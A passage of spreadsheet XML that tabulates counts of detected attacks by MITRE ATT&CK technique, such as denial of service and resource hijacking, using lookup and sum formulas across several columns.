        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F47" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (12)</v>
      </c>
      <c r="G47" s="292">
        <v>5</v>
      </c>
      <c r="H47" s="322">
        <v>1</v>
      </c>
      <c r="I47" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (5)</v>
      </c>
      <c r="J47" s="12">
        <v>1</v>
      </c>
      <c r="K47" s="13">
        <v>1</v>
      </c>
      <c r="L47" s="394">
        <v>1</v>
      </c>
      <c r="M47" s="322">
        <v>1</v>
      </c>
      <c r="N47" s="322">
        <v>1</v>
      </c>
      <c r="O47" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P47" s="12">
        <v>1</v>
      </c>
      <c r="Q47" s="13">
        <v>1</v>
      </c>
      <c r="R47" s="394">
        <v>1</v>
      </c>
      <c r="S47" s="292">
        <v>6</v>
      </c>
      <c r="T47" s="322">
        <v>2</v>
      </c>
      <c r="U47" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (6)</v>
      </c>
      <c r="V47" s="12">
        <v>2</v>
      </c>
      <c r="W47" s="13">
        <v>1</v>
      </c>
      <c r="X47" s="394">
        <v>1</v>
      </c>
      <c r="Y47" s="392">
        <v>6</v>
      </c>
      <c r="Z47" s="392">
        <v>2</v>
      </c>
      <c r="AA47" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (6)</v>
      </c>
      <c r="AB47" s="392">
        <v>2</v>
      </c>
      <c r="AC47" s="16">
        <v>1</v>
      </c>
      <c r="AD47" s="394">
        <v>1</v>
      </c>
      <c r="AE47" s="392">
        <v>6</v>
      </c>
      <c r="AF47" s="392">
        <v>4</v>
      </c>
      <c r="AG47" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH47" s="392">
        <v>4</v>
      </c>
      <c r="AI47" s="16">
        <v>1</v>
      </c>
      <c r="AJ47" s="394">
        <v>1</v>
      </c>
      <c r="AK47" s="392">
        <v>12</v>
      </c>
      <c r="AL47" s="392">
        <v>6</v>
      </c>
      <c r="AM47" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (12)</v>
      </c>
      <c r="AN47" s="392">
        <v>6</v>
      </c>
      <c r="AO47" s="16">
        <v>1</v>
      </c>
      <c r="AP47" s="394">
        <v>1</v>
      </c>
      <c r="AQ47" s="292">
        <v>0</v>
      </c>
      <c r="AR47" s="322">
        <v>0</v>
      </c>
      <c r="AS47" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT47" s="12">
        <v>0</v>
      </c>
      <c r="AU47" s="13">
        <v>0</v>
      </c>
      <c r="AV47" s="394">
        <v>0</v>
      </c>
      <c r="AW47" s="392">
        <v>0</v>
      </c>
      <c r="AX47" s="392">
        <v>0</v>
      </c>
      <c r="AY47" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ47" s="4">
        <v>0</v>
      </c>
      <c r="BA47" s="16">
        <v>0</v>
      </c>
      <c r="BB47" s="394">
        <v>0</v>
      </c>
      <c r="BC47" s="292">
        <v>6</v>
      </c>
      <c r="BD47" s="322">
        <v>2</v>
      </c>
      <c r="BE47" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (6)</v>
      </c>
      <c r="BF47" s="12">
        <v>2</v>
      </c>
      <c r="BG47" s="13">
        <v>1</v>
      </c>
      <c r="BH47" s="394">
        <v>1</v>
      </c>
      <c r="BI47" s="292">
        <v>3</v>
      </c>
      <c r="BJ47" s="322">
        <v>2</v>
      </c>
      <c r="BK47" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL47" s="12">
        <v>2</v>
      </c>
      <c r="BM47" s="13">
        <v>1</v>
      </c>
      <c r="BN47" s="394">
        <v>1</v>
      </c>
      <c r="BO47" s="292">
        <v>10</v>
      </c>
      <c r="BP47" s="322">
        <v>9</v>
      </c>
      <c r="BQ47" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (10)</v>
      </c>
      <c r="BR47" s="12">
        <v>2</v>
      </c>
      <c r="BS47" s="12">
        <v>4</v>
      </c>
      <c r="BT47" s="13">
        <v>1</v>
      </c>
      <c r="BU47" s="394">
        <v>8</v>
      </c>
      <c r="BV47" s="292">
        <v>0</v>
      </c>
      <c r="BW47" s="322">
        <v>0</v>
      </c>
      <c r="BX47" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY47" s="12">
        <v>0</v>
      </c>
      <c r="BZ47" s="13">
        <v>0</v>
      </c>
      <c r="CA47" s="394">
        <v>0</v>
      </c>
      <c r="CB47" s="292">
        <v>0</v>
      </c>
      <c r="CC47" s="322">
        <v>0</v>
      </c>
      <c r="CD47" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE47" s="12">
        <v>0</v>
      </c>
      <c r="CF47" s="12">
        <v>0</v>
      </c>
      <c r="CG47" s="13">
        <v>0</v>
      </c>
      <c r="CH47" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:86" ht="15" customHeight="1">
      <c r="A48" s="4">
        <f t="shared" si="13"/>
        <v>46</v>
      </c>
      <c r="B48" s="4" t="str">
        <f>IFERROR(VLOOKUP(A48,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1496</v>
      </c>
      <c r="C48" s="493" t="str">
        <f>IFERROR(VLOOKUP(B48,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="D48" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B48)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E48" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F48" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (12)</v>
      </c>
      <c r="G48" s="292">
        <v>0</v>
      </c>
      <c r="H48" s="322">
        <v>0</v>
      </c>
      <c r="I48" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J48" s="12">
        <v>0</v>
      </c>
      <c r="K48" s="13">
        <v>0</v>
      </c>
      <c r="L48" s="394">
        <v>0</v>
      </c>
      <c r="M48" s="322">
        <v>0</v>
      </c>
      <c r="N48" s="322">
        <v>0</v>
      </c>
      <c r="O48" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P48" s="12">
        <v>0</v>
      </c>
      <c r="Q48" s="13">
        <v>0</v>
      </c>
      <c r="R48" s="394">
        <v>0</v>
      </c>
      <c r="S48" s="292">
        <v>0</v>
      </c>
      <c r="T48" s="322">
        <v>0</v>
      </c>
      <c r="U48" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V48" s="12">
        <v>0</v>
      </c>
      <c r="W48" s="13">
        <v>0</v>
      </c>
      <c r="X48" s="394">
        <v>0</v>
      </c>
      <c r="Y48" s="392">
        <v>2</v>
      </c>
      <c r="Z48" s="392">
        <v>2</v>
      </c>
      <c r="AA48" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB48" s="392">
        <v>1</v>
      </c>
      <c r="AC48" s="16">
        <v>1</v>
      </c>
      <c r="AD48" s="394">
        <v>2</v>
      </c>
      <c r="AE48" s="392">
        <v>6</v>
      </c>
      <c r="AF48" s="392">
        <v>4</v>
      </c>
      <c r="AG48" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH48" s="392">
        <v>2</v>
      </c>
      <c r="AI48" s="16">
        <v>1</v>
      </c>
      <c r="AJ48" s="394">
        <v>3</v>
      </c>
      <c r="AK48" s="392">
        <v>8</v>
      </c>
      <c r="AL48" s="392">
        <v>6</v>
      </c>
      <c r="AM48" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (8)</v>
      </c>
      <c r="AN48" s="392">
        <v>3</v>
      </c>
      <c r="AO48" s="16">
        <v>1</v>
      </c>
      <c r="AP48" s="394">
        <v>4</v>
      </c>
      <c r="AQ48" s="292">
        <v>0</v>
      </c>
      <c r="AR48" s="322">
        <v>0</v>
      </c>
      <c r="AS48" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT48" s="12">
        <v>0</v>
      </c>
      <c r="AU48" s="13">
        <v>0</v>
      </c>
      <c r="AV48" s="394">
        <v>0</v>
      </c>
      <c r="AW48" s="392">
        <v>2</v>
      </c>
      <c r="AX48" s="392">
        <v>2</v>
      </c>
      <c r="AY48" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (2)</v>
      </c>
      <c r="AZ48" s="4">
        <v>1</v>
      </c>
      <c r="BA48" s="16">
        <v>1</v>
      </c>
      <c r="BB48" s="394">
        <v>2</v>
      </c>
      <c r="BC48" s="292">
        <v>2</v>
      </c>
      <c r="BD48" s="322">
        <v>2</v>
      </c>
      <c r="BE48" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (2)</v>
      </c>
      <c r="BF48" s="12">
        <v>1</v>
      </c>
      <c r="BG48" s="13">
        <v>1</v>
      </c>
      <c r="BH48" s="394">
        <v>2</v>
      </c>
      <c r="BI48" s="292">
        <v>0</v>
      </c>
      <c r="BJ48" s="322">
        <v>0</v>
      </c>
      <c r="BK48" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL48" s="12">
        <v>0</v>
      </c>
      <c r="BM48" s="13">
        <v>0</v>
      </c>
      <c r="BN48" s="394">
        <v>0</v>
      </c>
      <c r="BO48" s="292">
        <v>13</v>
      </c>
      <c r="BP48" s="322">
        <v>10</v>
      </c>
      <c r="BQ48" s="322" t="str">
        <f t="shared" si="10"/>
        <v>10 (13)</v>
      </c>
      <c r="BR48" s="12">
        <v>0</v>
      </c>
      <c r="BS48" s="12">
        <v>5</v>
      </c>
      <c r="BT48" s="13">
        <v>1</v>
      </c>
      <c r="BU48" s="394">
        <v>10</v>
      </c>
      <c r="BV48" s="292">
        <v>2</v>
      </c>
      <c r="BW48" s="322">
        <v>2</v>
      </c>
      <c r="BX48" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY48" s="12">
        <v>1</v>
      </c>
      <c r="BZ48" s="13">
        <v>1</v>
      </c>
      <c r="CA48" s="394">
        <v>2</v>
      </c>
      <c r="CB48" s="292">
        <v>3</v>
      </c>
      <c r="CC48" s="322">
        <v>3</v>
      </c>
      <c r="CD48" s="322" t="str">
        <f t="shared" si="12"/>
        <v>3 (3)</v>
      </c>
      <c r="CE48" s="12">
        <v>0</v>
      </c>
      <c r="CF48" s="12">
        <v>2</v>
      </c>
      <c r="CG48" s="13">
        <v>1</v>
      </c>
      <c r="CH48" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="49" spans="1:86" ht="15" customHeight="1">
      <c r="A49" s="4">
        <f t="shared" si="13"/>
        <v>47</v>
      </c>
      <c r="B49" s="4" t="str">
        <f>IFERROR(VLOOKUP(A49,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1498</v>
      </c>
      <c r="C49" s="493" t="str">
        <f>IFERROR(VLOOKUP(B49,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="D49" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B49)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>8</v>
      </c>
      <c r="E49" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1432072</v>
      </c>
      <c r="F49" s="579" t="str">
        <f t="shared" si="14"/>
        <v>8 (1432072)</v>
      </c>
      <c r="G49" s="292">
        <v>272</v>
      </c>
      <c r="H49" s="322">
        <v>251</v>
      </c>
      <c r="I49" s="322" t="str">
        <f t="shared" si="0"/>
        <v>251 (272)</v>
      </c>
      <c r="J49" s="12">
        <v>2</v>
      </c>
      <c r="K49" s="13">
        <v>0.375</v>
      </c>
      <c r="L49" s="394">
        <v>251</v>
      </c>
      <c r="M49" s="322">
        <v>603</v>
      </c>
      <c r="N49" s="322">
        <v>603</v>
      </c>
      <c r="O49" s="322" t="str">
        <f t="shared" si="1"/>
        <v>603 (603)</v>
      </c>
      <c r="P49" s="12">
        <v>2</v>
      </c>
      <c r="Q49" s="13">
        <v>0.25</v>
      </c>
      <c r="R49" s="394">
        <v>603</v>
      </c>
      <c r="S49" s="292">
        <v>875</v>
      </c>
      <c r="T49" s="322">
        <v>854</v>
      </c>
      <c r="U49" s="322" t="str">
        <f t="shared" si="2"/>
        <v>854 (875)</v>
      </c>
      <c r="V49" s="12">
        <v>4</v>
      </c>
      <c r="W49" s="13">
        <v>0.375</v>
      </c>
      <c r="X49" s="394">
        <v>854</v>
      </c>
      <c r="Y49" s="392">
        <v>374514</v>
      </c>
      <c r="Z49" s="392">
        <v>310023</v>
      </c>
      <c r="AA49" s="322" t="str">
        <f t="shared" si="3"/>
        <v>310023 (374514)</v>
      </c>
      <c r="AB49" s="392">
        <v>4</v>
      </c>
      <c r="AC49" s="16">
        <v>0.375</v>
      </c>
      <c r="AD49" s="394">
        <v>163712</v>
      </c>
      <c r="AE49" s="392">
        <v>68413</v>
      </c>
      <c r="AF49" s="392">
        <v>58726</v>
      </c>
      <c r="AG49" s="322" t="str">
        <f t="shared" si="4"/>
        <v>58726 (68413)</v>
      </c>
      <c r="AH49" s="392">
        <v>9</v>
      </c>
      <c r="AI49" s="16">
        <v>1</v>
      </c>
      <c r="AJ49" s="394">
        <v>58061</v>
      </c>
      <c r="AK49" s="392">
        <v>442927</v>
      </c>
      <c r="AL49" s="392">
        <v>368749</v>
      </c>
      <c r="AM49" s="322" t="str">
        <f t="shared" si="5"/>
        <v>368749 (442927)</v>
      </c>
      <c r="AN49" s="392">
        <v>13</v>
      </c>
      <c r="AO49" s="16">
        <v>1</v>
      </c>
      <c r="AP49" s="394">
        <v>164042</v>
      </c>
      <c r="AQ49" s="292">
        <v>0</v>
      </c>
      <c r="AR49" s="322">
        <v>0</v>
      </c>
      <c r="AS49" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT49" s="12">
        <v>0</v>
      </c>
      <c r="AU49" s="13">
        <v>0</v>
      </c>
      <c r="AV49" s="394">
        <v>0</v>
      </c>
      <c r="AW49" s="392">
        <v>0</v>
      </c>
      <c r="AX49" s="392">
        <v>0</v>
      </c>
      <c r="AY49" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ49" s="4">
        <v>0</v>
      </c>
      <c r="BA49" s="16">
        <v>0</v>
      </c>
      <c r="BB49" s="394">
        <v>0</v>
      </c>
      <c r="BC49" s="292">
        <v>875</v>
      </c>
      <c r="BD49" s="322">
        <v>854</v>
      </c>
      <c r="BE49" s="322" t="str">
        <f t="shared" si="8"/>
        <v>854 (875)</v>
      </c>
      <c r="BF49" s="12">
        <v>4</v>
      </c>
      <c r="BG49" s="13">
        <v>0.375</v>
      </c>
      <c r="BH49" s="394">
        <v>854</v>
      </c>
      <c r="BI49" s="292">
        <v>317130</v>
      </c>
      <c r="BJ49" s="322">
        <v>317130</v>
      </c>
      <c r="BK49" s="322" t="str">
        <f t="shared" si="9"/>
        <v>317130 (317130)</v>
      </c>
      <c r="BL49" s="12">
        <v>1</v>
      </c>
      <c r="BM49" s="13">
        <v>0.125</v>
      </c>
      <c r="BN49" s="394">
        <v>317130</v>
      </c>
      <c r="BO49" s="292">
        <v>934641</v>
      </c>
      <c r="BP49" s="322">
        <v>923822</v>
      </c>
      <c r="BQ49" s="322" t="str">
        <f t="shared" si="10"/>
        <v>923822 (934641)</v>
      </c>
      <c r="BR49" s="12">
        <v>1</v>
      </c>
      <c r="BS49" s="12">
        <v>10</v>
      </c>
      <c r="BT49" s="13">
        <v>1</v>
      </c>
      <c r="BU49" s="394">
        <v>606695</v>
      </c>
      <c r="BV49" s="292">
        <v>19670</v>
      </c>
      <c r="BW49" s="322">
        <v>19670</v>
      </c>
      <c r="BX49" s="322" t="str">
        <f t="shared" si="11"/>
        <v>19670 (19670)</v>
      </c>
      <c r="BY49" s="12">
        <v>2</v>
      </c>
      <c r="BZ49" s="13">
        <v>0.25</v>
      </c>
      <c r="CA49" s="394">
        <v>19670</v>
      </c>
      <c r="CB49" s="292">
        <v>1432047</v>
      </c>
      <c r="CC49" s="322">
        <v>1363310</v>
      </c>
      <c r="CD49" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1363310 (1432047)</v>
      </c>
      <c r="CE49" s="12">
        <v>0</v>
      </c>
      <c r="CF49" s="12">
        <v>3</v>
      </c>
      <c r="CG49" s="13">
        <v>0.375</v>
      </c>
      <c r="CH49" s="394">
        <v>1363310</v>
      </c>
    </row>
    <row r="50" spans="1:86" ht="15" customHeight="1">
      <c r="A50" s="4">
        <f t="shared" si="13"/>
        <v>48</v>
      </c>
      <c r="B50" s="4" t="str">
        <f>IFERROR(VLOOKUP(A50,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1499</v>
      </c>
      <c r="C50" s="493" t="str">
        <f>IFERROR(VLOOKUP(B50,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="D50" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B50)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>10</v>
      </c>
      <c r="E50" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2061420</v>
      </c>
      <c r="F50" s="579" t="str">
        <f t="shared" si="14"/>
        <v>10 (2061420)</v>
      </c>
      <c r="G50" s="292">
        <v>10968</v>
      </c>
      <c r="H50" s="322">
        <v>6194</v>
      </c>
      <c r="I50" s="322" t="str">
        <f t="shared" si="0"/>
        <v>6194 (10968)</v>
      </c>
      <c r="J50" s="12">
        <v>3</v>
      </c>
      <c r="K50" s="13">
        <v>0.5</v>
      </c>
      <c r="L50" s="394">
        <v>6179</v>
      </c>
      <c r="M50" s="322">
        <v>1</v>
      </c>
      <c r="N50" s="322">
        <v>1</v>
      </c>
      <c r="O50" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P50" s="12">
        <v>1</v>
      </c>
      <c r="Q50" s="13">
        <v>0.1</v>
      </c>
      <c r="R50" s="394">
        <v>1</v>
      </c>
      <c r="S50" s="292">
        <v>10969</v>
      </c>
      <c r="T50" s="322">
        <v>6195</v>
      </c>
      <c r="U50" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6195 (10969)</v>
      </c>
      <c r="V50" s="12">
        <v>4</v>
      </c>
      <c r="W50" s="13">
        <v>0.5</v>
      </c>
      <c r="X50" s="394">
        <v>6180</v>
      </c>
      <c r="Y50" s="392">
        <v>687850</v>
      </c>
      <c r="Z50" s="392">
        <v>51251</v>
      </c>
      <c r="AA50" s="322" t="str">
        <f t="shared" si="3"/>
        <v>51251 (687850)</v>
      </c>
      <c r="AB50" s="392">
        <v>10</v>
      </c>
      <c r="AC50" s="16">
        <v>0.7</v>
      </c>
      <c r="AD50" s="394">
        <v>33728</v>
      </c>
      <c r="AE50" s="392">
        <v>116272</v>
      </c>
      <c r="AF50" s="392">
        <v>75</v>
      </c>
      <c r="AG50" s="322" t="str">
        <f t="shared" si="4"/>
        <v>75 (116272)</v>
      </c>
      <c r="AH50" s="392">
        <v>6</v>
      </c>
      <c r="AI50" s="16">
        <v>1</v>
      </c>
      <c r="AJ50" s="394">
        <v>63</v>
      </c>
      <c r="AK50" s="392">
        <v>804122</v>
      </c>
      <c r="AL50" s="392">
        <v>51326</v>
      </c>
      <c r="AM50" s="322" t="str">
        <f t="shared" si="5"/>
        <v>51326 (804122)</v>
      </c>
      <c r="AN50" s="392">
        <v>16</v>
      </c>
      <c r="AO50" s="16">
        <v>1</v>
      </c>
      <c r="AP50" s="394">
        <v>33750</v>
      </c>
      <c r="AQ50" s="292">
        <v>0</v>
      </c>
      <c r="AR50" s="322">
        <v>0</v>
      </c>
      <c r="AS50" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT50" s="12">
        <v>0</v>
      </c>
      <c r="AU50" s="13">
        <v>0</v>
      </c>
      <c r="AV50" s="394">
        <v>0</v>
      </c>
      <c r="AW50" s="392">
        <v>658</v>
      </c>
      <c r="AX50" s="392">
        <v>612</v>
      </c>
      <c r="AY50" s="322" t="str">
        <f t="shared" si="7"/>
        <v>612 (658)</v>
      </c>
      <c r="AZ50" s="4">
        <v>2</v>
      </c>
      <c r="BA50" s="16">
        <v>0.3</v>
      </c>
      <c r="BB50" s="394">
        <v>612</v>
      </c>
      <c r="BC50" s="292">
        <v>11627</v>
      </c>
      <c r="BD50" s="322">
        <v>6807</v>
      </c>
      <c r="BE50" s="322" t="str">
        <f t="shared" si="8"/>
        <v>6807 (11627)</v>
      </c>
      <c r="BF50" s="12">
        <v>6</v>
      </c>
      <c r="BG50" s="13">
        <v>0.6</v>
      </c>
      <c r="BH50" s="394">
        <v>6782</v>
      </c>
      <c r="BI50" s="292">
        <v>941</v>
      </c>
      <c r="BJ50" s="322">
        <v>524</v>
      </c>
      <c r="BK50" s="322" t="str">
        <f t="shared" si="9"/>
        <v>524 (941)</v>
      </c>
      <c r="BL50" s="12">
        <v>2</v>
      </c>
      <c r="BM50" s="13">
        <v>0.2</v>
      </c>
      <c r="BN50" s="394">
        <v>524</v>
      </c>
      <c r="BO50" s="292">
        <v>696061</v>
      </c>
      <c r="BP50" s="322">
        <v>695642</v>
      </c>
      <c r="BQ50" s="322" t="str">
        <f t="shared" si="10"/>
        <v>695642 (696061)</v>
      </c>
      <c r="BR50" s="12">
        <v>2</v>
      </c>
      <c r="BS50" s="12">
        <v>11</v>
      </c>
      <c r="BT50" s="13">
        <v>0.6</v>
      </c>
      <c r="BU50" s="394">
        <v>361385</v>
      </c>
      <c r="BV50" s="292">
        <v>28</v>
      </c>
      <c r="BW50" s="322">
        <v>28</v>
      </c>
      <c r="BX50" s="322" t="str">
        <f t="shared" si="11"/>
        <v>28 (28)</v>
      </c>
      <c r="BY50" s="12">
        <v>2</v>
      </c>
      <c r="BZ50" s="13">
        <v>0.2</v>
      </c>
      <c r="CA50" s="394">
        <v>28</v>
      </c>
      <c r="CB50" s="292">
        <v>1839945</v>
      </c>
      <c r="CC50" s="322">
        <v>1116270</v>
      </c>
      <c r="CD50" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1116270 (1839945)</v>
      </c>
      <c r="CE50" s="12">
        <v>0</v>
      </c>
      <c r="CF50" s="12">
        <v>2</v>
      </c>
      <c r="CG50" s="13">
        <v>0.5</v>
      </c>
      <c r="CH50" s="394">
        <v>1116270</v>
      </c>
    </row>
    <row r="51" spans="1:86" ht="15" customHeight="1">
      <c r="A51" s="4">
        <f t="shared" si="13"/>
        <v>49</v>
      </c>
      <c r="B51" s="4" t="str">
        <f>IFERROR(VLOOKUP(A51,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1505</v>
      </c>
      <c r="C51" s="493" t="str">
        <f>IFERROR(VLOOKUP(B51,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Server Software Component</v>
      </c>
      <c r="D51" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B51)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E51" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F51" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G51" s="292">
        <v>2</v>
      </c>
      <c r="H51" s="322">
        <v>1</v>
      </c>
      <c r="I51" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J51" s="12">
        <v>1</v>
      </c>
      <c r="K51" s="13">
        <v>1</v>
      </c>
      <c r="L51" s="394">
        <v>1</v>
      </c>
      <c r="M51" s="322">
        <v>0</v>
      </c>
      <c r="N51" s="322">
        <v>0</v>
      </c>
      <c r="O51" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P51" s="12">
        <v>0</v>
      </c>
      <c r="Q51" s="13">
        <v>0</v>
      </c>
      <c r="R51" s="394">
        <v>0</v>
      </c>
      <c r="S51" s="292">
        <v>2</v>
      </c>
      <c r="T51" s="322">
        <v>1</v>
      </c>
      <c r="U51" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V51" s="12">
        <v>1</v>
      </c>
      <c r="W51" s="13">
        <v>1</v>
      </c>
      <c r="X51" s="394">
        <v>1</v>
      </c>
      <c r="Y51" s="392">
        <v>2</v>
      </c>
      <c r="Z51" s="392">
        <v>1</v>
      </c>
      <c r="AA51" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="AB51" s="392">
        <v>1</v>
      </c>
      <c r="AC51" s="16">
        <v>1</v>
      </c>
      <c r="AD51" s="394">
        <v>1</v>
      </c>
      <c r="AE51" s="392">
        <v>5</v>
      </c>
      <c r="AF51" s="392">
        <v>3</v>
      </c>
      <c r="AG51" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (5)</v>
      </c>
      <c r="AH51" s="392">
        <v>3</v>
      </c>
      <c r="AI51" s="16">
        <v>1</v>
      </c>
      <c r="AJ51" s="394">
        <v>2</v>
      </c>
      <c r="AK51" s="392">
        <v>7</v>
      </c>
      <c r="AL51" s="392">
        <v>4</v>
      </c>
      <c r="AM51" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (7)</v>
      </c>
      <c r="AN51" s="392">
        <v>4</v>
      </c>
      <c r="AO51" s="16">
        <v>1</v>
      </c>
      <c r="AP51" s="394">
        <v>3</v>
      </c>
      <c r="AQ51" s="292">
        <v>0</v>
      </c>
      <c r="AR51" s="322">
        <v>0</v>
      </c>
      <c r="AS51" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT51" s="12">
        <v>0</v>
      </c>
      <c r="AU51" s="13">
        <v>0</v>
      </c>
      <c r="AV51" s="394">
        <v>0</v>
      </c>
      <c r="AW51" s="392">
        <v>0</v>
      </c>
      <c r="AX51" s="392">
        <v>0</v>
      </c>
      <c r="AY51" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ51" s="4">
        <v>0</v>
      </c>
      <c r="BA51" s="16">
        <v>0</v>
      </c>
      <c r="BB51" s="394">
        <v>0</v>
      </c>
      <c r="BC51" s="292">
        <v>2</v>
      </c>
      <c r="BD51" s="322">
        <v>1</v>
      </c>
      <c r="BE51" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (2)</v>
      </c>
      <c r="BF51" s="12">
        <v>1</v>
      </c>
      <c r="BG51" s="13">
        <v>1</v>
      </c>
      <c r="BH51" s="394">
        <v>1</v>
      </c>
      <c r="BI51" s="292">
        <v>0</v>
      </c>
      <c r="BJ51" s="322">
        <v>0</v>
      </c>
      <c r="BK51" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL51" s="12">
        <v>0</v>
      </c>
      <c r="BM51" s="13">
        <v>0</v>
      </c>
      <c r="BN51" s="394">
        <v>0</v>
      </c>
      <c r="BO51" s="292">
        <v>4</v>
      </c>
      <c r="BP51" s="322">
        <v>4</v>
      </c>
      <c r="BQ51" s="322" t="str">
        <f t="shared" si="10"/>
        <v>4 (4)</v>
      </c>
      <c r="BR51" s="12">
        <v>0</v>
      </c>
      <c r="BS51" s="12">
        <v>2</v>
      </c>
      <c r="BT51" s="13">
        <v>1</v>
      </c>
      <c r="BU51" s="394">
        <v>2</v>
      </c>
      <c r="BV51" s="292">
        <v>0</v>
      </c>
      <c r="BW51" s="322">
        <v>0</v>
      </c>
      <c r="BX51" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY51" s="12">
        <v>0</v>
      </c>
      <c r="BZ51" s="13">
        <v>0</v>
      </c>
      <c r="CA51" s="394">
        <v>0</v>
      </c>
      <c r="CB51" s="292">
        <v>3</v>
      </c>
      <c r="CC51" s="322">
        <v>2</v>
      </c>
      <c r="CD51" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (3)</v>
      </c>
